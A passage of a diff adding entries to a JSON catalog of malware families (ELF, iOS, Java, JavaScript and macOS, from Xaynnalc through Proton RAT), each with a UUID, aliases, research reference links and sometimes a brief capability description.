"synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", + "https://twitter.com/michalmalik/status/846368624147353601" + ] + }, + "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", + "value": "Xaynnalc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + ] + }, + "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", + "value": "XOR DDoS", + "description": "Linux DDoS C&C Malware" + }, + { + "meta": { + "synonyms": [ + "darlloz" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", + "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" + ] + }, + "uuid": "9218630d-0425-4b18-802c-447a9322990d", + "value": "Zollard", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", + "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" + ] + }, + "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", + "value": "GuiInject", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": 
"WireLurker", + "description": "The iOS malware that is installed over USB by osx.wirelurker" + }, + { + "meta": { + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "http://malware-traffic-analysis.net/2017/07/04/index.html", + "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + ] + }, + "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", + "value": "AdWind", + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. 
Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + }, + { + "meta": { + "synonyms": [ + "Trupto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", + "value": "CrossRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jacksbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://github.com/java-rat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", + "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" + ] + }, + "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", + "value": "jRAT", + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", + "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" + ] + }, + "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", + "value": "jSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", + "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/", + "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/" + ] + }, + "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", + "value": "Qarallax RAT", + "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT)." + }, + { + "meta": { + "synonyms": [ + "Quaverse RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", + "https://www.digitrustgroup.com/java-rat-qrat/", + "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market" + ] + }, + "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", + "value": "QRat", + "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", + "https://github.com/shotskeber/Ratty" + ] + }, + "uuid": "da032a95-b02a-4af2-b563-69f686653af4", + "value": "Ratty", + "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", + "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" + ] + }, + "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", + "value": "AIRBREAK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", + "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" + ] + }, + "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", + "value": "Bateleur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", + "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", + "https://twitter.com/JohnLaTwC/status/983011262731714565" + ] + }, + "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", + "value": "CryptoNight", + "description": "WebAssembly-based crpyto miner." 
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Roblox Trade Assist"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/"
+ ]
+ },
+ "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60",
+ "value": "CukieGrab",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak",
+ "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/",
+ "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack"
+ ]
+ },
+ "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537",
+ "value": "KopiLuwak",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart",
+ "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/"
+ ]
+ },
+ "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936",
+ "value": "magecart",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SpicyOmelette"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
+ "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/",
+ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
+ "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
+ "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
+ "https://blog.morphisec.com/cobalt-gang-2.0"
+ ]
+ },
+ "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f",
+ "value": "More_eggs",
+ "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/"
+ ]
+ },
+ "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e",
+ "value": "Powmet",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox",
+ "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks",
+ "http://resources.infosecinstitute.com/scanbox-framework/"
+ ]
+ },
+ "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa",
+ "value": "scanbox",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext",
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ ]
+ },
+ "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985",
+ "value": "HTML5 Encoding",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools",
+ "https://twitter.com/JohnLaTwC/status/915590893155098629"
+ ]
+ },
+ "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b",
+ "value": "Maintools.js",
+ "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050",
+ "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef",
+ "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f"
+ ]
+ },
+ "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d",
+ "value": "Unidentified 050 (APT32 Profiler)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf"
+ ]
+ },
+ "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7",
+ "value": "witchcoven",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella",
+ "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/",
+ "https://github.com/kai5263499/Bella",
+ "https://github.com/kai5263499/Bella"
+ ]
+ },
+ "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248",
+ "value": "Bella",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Mask",
+ "Appetite"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto",
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
+ ]
+ },
+ "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac",
+ "value": "Careto",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief",
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
+ ]
+ },
+ "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8",
+ "value": "CoinThief",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat",
+ "https://objective-see.com/blog/blog_0x2A.html"
+ ]
+ },
+ "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf",
+ "value": "Coldroot RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner",
+ "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
+ ]
+ },
+ "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
+ "value": "CpuMeaner",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater",
+ "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
+ "https://digitasecurity.com/blog/2018/02/05/creativeupdater/",
+ "https://objective-see.com/blog/blog_0x29.html"
+ ]
+ },
+ "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999",
+ "value": "CreativeUpdater",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis",
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
+ "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
+ "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?"
+ ]
+ },
+ "uuid": "4b2ab902-811e-4b50-8510-43454d77d027",
+ "value": "Crisis",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider",
+ "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social"
+ ]
+ },
+ "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302",
+ "value": "Crossrider",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster",
+ "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html",
+ "https://www.f-secure.com/weblog/archives/00002466.html"
+ ]
+ },
+ "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930",
+ "value": "Dockster",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy",
+ "https://objective-see.com/blog/blog_0x32.html"
+ ]
+ },
+ "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d",
+ "value": "Dummy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx",
+ "https://github.com/Marten4n6/EvilOSX",
+ "https://twitter.com/JohnLaTwC/status/966139336436498432"
+ ]
+ },
+ "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d",
+ "value": "EvilOSX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback",
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
+ "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
+ "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html"
+ ]
+ },
+ "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0",
+ "value": "FlashBack",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Quimitchin"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly",
+ "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
+ "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
+ "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
+ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
+ "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
+ "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf"
+ ]
+ },
+ "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597",
+ "value": "FruitFly",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus",
+ "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/"
+ ]
+ },
+ "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39",
+ "value": "HiddenLotus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Revir"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler",
+ "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html",
+ "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/"
+ ]
+ },
+ "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759",
+ "value": "iMuler",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/",
+ "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html"
+ ]
+ },
+ "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786",
+ "value": "KeRanger",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
+ "https://github.com/eset/malware-ioc/tree/master/keydnap"
+ ]
+ },
+ "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6",
+ "value": "Keydnap",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "KitM"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos",
+ "https://www.f-secure.com/weblog/archives/00002558.html"
+ ]
+ },
+ "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd",
+ "value": "Kitmos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "SedUploader",
+ "JHUHUGIT",
+ "JKEYSKW"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex",
+ "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf"
+ ]
+ },
+ "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e",
+ "value": "Komplex",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/"
+ ]
+ },
+ "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b",
+ "value": "Laoshu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage",
+ "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/",
+ "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis"
+ ]
+ },
+ "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87",
+ "value": "Leverage",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader",
+ "https://iranthreats.github.io/resources/macdownloader-macos-malware/"
+ ]
+ },
+ "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13",
+ "value": "MacDownloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller",
+ "https://objective-see.com/blog/blog_0x16.html"
+ ]
+ },
+ "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02",
+ "value": "MacInstaller",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom",
+ "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service",
+ "https://objective-see.com/blog/blog_0x1E.html"
+ ]
+ },
+ "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b",
+ "value": "MacRansom",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy",
+ "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
+ ]
+ },
+ "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7",
+ "value": "MacSpy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx",
+ "https://objective-see.com/blog/blog_0x16.html"
+ ]
+ },
+ "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe",
+ "value": "MacVX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami",
+ "https://objective-see.com/blog/blog_0x26.html"
+ ]
+ },
+ "uuid": "7759534c-3298-42e9-adab-896d7e507f4f",
+ "value": "MaMi",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes",
+ "https://objective-see.com/blog/blog_0x16.html",
+ "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/"
+ ]
+ },
+ "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
+ "value": "Mokes",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec",
+ "https://objective-see.com/blog/blog_0x20.html"
+ ]
+ },
+ "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405",
+ "value": "Mughthesec",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus",
+ "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update",
+ "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/"
+ ]
+ },
+ "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65",
+ "value": "OceanLotus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx",
+ "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
+ "https://news.drweb.com/show/?i=1750&lng=en&c=14"
+ ]
+ },
+ "uuid": "cd397973-8f42-4c49-8322-414ea77ec773",
+ "value": "Olyx",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Findzip"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher",
+ "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/"
+ ]
+ },
+ "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8",
+ "value": "Patcher",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit",
+ "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf",
+ "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/"
+ ]
+ },
+ "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c",
+ "value": "Pirrit",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Calisto"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat",
+ "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does",
+ "https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/",
+ "https://objective-see.com/blog/blog_0x1D.html",
+ "https://securelist.com/calisto-trojan-for-macos/86543/",
+ "https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/",
+ "https://objective-see.com/blog/blog_0x1F.html",
+ "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
+ "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
+ "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
+ ]
+ },
+ "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44",
+ "value": "Proton RAT",
+ "description": ""
+ },
+ {
